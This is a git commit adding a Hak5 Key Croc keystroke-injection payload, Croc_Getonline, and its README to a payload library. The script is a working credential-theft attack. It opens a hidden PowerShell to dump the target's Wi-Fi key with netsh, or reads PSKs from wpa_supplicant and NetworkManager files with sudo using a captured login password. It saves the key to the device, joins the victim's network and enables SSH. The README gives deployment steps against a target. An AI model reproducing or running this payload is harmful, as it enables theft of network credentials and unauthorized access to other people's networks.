Merge pull request #58 from spywill/master

Croc_Getonline
2023-03-17 12:01:18 -05:00 · 2023-03-17 12:01:18 -05:00 · 0ef3f8ae6d
parent 008766a165 3a97587fa0
commit 0ef3f8ae6d
2 changed files with 196 additions and 0 deletions
--- a/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
+++ b/payloads/library/credentials/Croc_Getonline/Croc_getonline.txt
@ -0,0 +1,118 @@
+# Title:           Croc_Getonline
+# Description:     Attempt to connect Keycroc automatically to target wifi access point
+#                  Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
+# Author:          spywill
+# Version:         3.5
+# Category:        Key Croc
+# Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro
+
+MATCH (getonline_W|getonline_R|getonline_L)
+
+CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
+for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
+
+wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
+
+if [ -f $wifi_pass ]; then
+	cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
+	rm -f $wifi_pass
+fi
+
+ATTACKMODE HID STORAGE
+Q DELAY 5000
+LED ATTACK
+
+case $LOOT in
+	getonline_W)
+		Q GUI r
+		Q DELAY 3000
+		Q STRING "powershell -NoP -NonI -W Hidden"
+		Q ENTER
+		Q DELAY 5000
+		Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
+		Q ENTER
+		Q DELAY 5000
+		Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+	getonline_R)
+		Q CONTROL-ALT-d
+		Q CONTROL-ALT-t
+		Q DELAY 2000
+		Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "umount \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+	getonline_L)
+		if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
+			PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
+		else
+			PC_PW=LINUX
+		fi
+		Q CONTROL-ALT-d
+		Q ALT-t
+		Q DELAY 2000
+		Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "$PC_PW"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
+		Q ENTER
+		Q DELAY 2000
+		Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
+		Q ENTER
+		Q DELAY 3000
+		Q STRING "sudo umount \$MOUNT_POINT ; exit"
+		Q ENTER
+;;
+esac
+
+ATTACKMODE HID
+sleep 3
+
+LED SETUP
+kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
+ifconfig wlan0 down
+
+if [ "$LOOT" = "getonline_W" ]; then
+	sed -i '0,/./s/^.//' $wifi_pass
+	sed -i 's/\r//g' $wifi_pass
+fi
+
+sed -i 's/\( \)*/\1/g' $wifi_pass
+sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
+sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
+wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
+ifconfig wlan0 up
+wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
+sleep 3
+systemctl restart ssh.service
+
+[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
+sleep 3
+LED OFF
--- a/payloads/library/credentials/Croc_Getonline/README.md
+++ b/payloads/library/credentials/Croc_Getonline/README.md
@ -0,0 +1,78 @@
+# Croc_Getonline
+
+## INTRODUCTION :
+  - This project is developed for the HAK5 KeyCroc
+  - Attempt to connect Keycroc automatically to target wifi access point.
+
+* **TESTED ON**
+  - Windows 10
+  - Raspberry pi 4 (bullseye image)
+  - linux (parrot os)
+
+## INSTALLATION :
+
+  - Enter arming mode on your keycroc to install file.
+  - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**
+
+## STARTING GETONLINE :
+
+   - After install plug into target and type in anywhere
+   - **getonline_W** <-- MATCH word for windows
+   - **getonline_L** <-- MATCH word for Linux
+   - **getonline_R** <-- MATCH word for Raspberry pi
+   - When the payload is done running the LED will light up green
+   - Keycroc should now be connected to target wifi access point
+   - NOTE: for linux edit payload for passwd needed for sudo permission
+
+## PAYLOAD INFO :
+
+**PowerShell script that performs the following actions:**
+
+Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
+Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
+
+Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT.
+Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
+
+**Bash script that performs the following actions:**
+
+Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
+Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
+Gets the password for the current wireless network by searching for the SSID in the /etc/wpa_supplicant/wpa_supplicant.conf file and extracting the password using sed.
+Writes the SSID and password to a file located at $MOUNT_POINT using tee.
+Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
+
+**Bash script that performs the following actions:**
+
+Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
+Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
+Mounts the volume with the label "KeyCroc" to the mount point directory using the mount command with the -L flag to specify the label of the volume to be mounted.
+Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
+Gets the password for the current wireless network by searching for the SSID in the /etc/NetworkManager/system-connections/ directory and extracting the password using grep and sed.
+Writes the SSID and password to a file located at $MOUNT_POINT using tee with sudo to obtain elevated privileges.
+Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
+
+Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
+
+**-Sed command that performs the following actions:** 
+
+By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
+
+1{x;s#^#sed -n 1p wifipass.txt#e;x}
+
+1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s
+x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
+s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
+x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
+
+10{G;s/\n(\S+).*/ \1/}
+
+10{..} executes the commands between the ellipses on the tenth line of config.txt.
+G append the contents of hold space to the pattern space using a newline as a separator.
+s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
+
+11{G;s/\n\S+//}
+
+11{..} executes the commands between the ellipses on the eleventh line of config.txt.
+G append the contents of hold space to the pattern space using a newline as a separator.
+s/\n\S+// match on the appended hold space and remove the newline and the first column, thus leaving a space and the second column.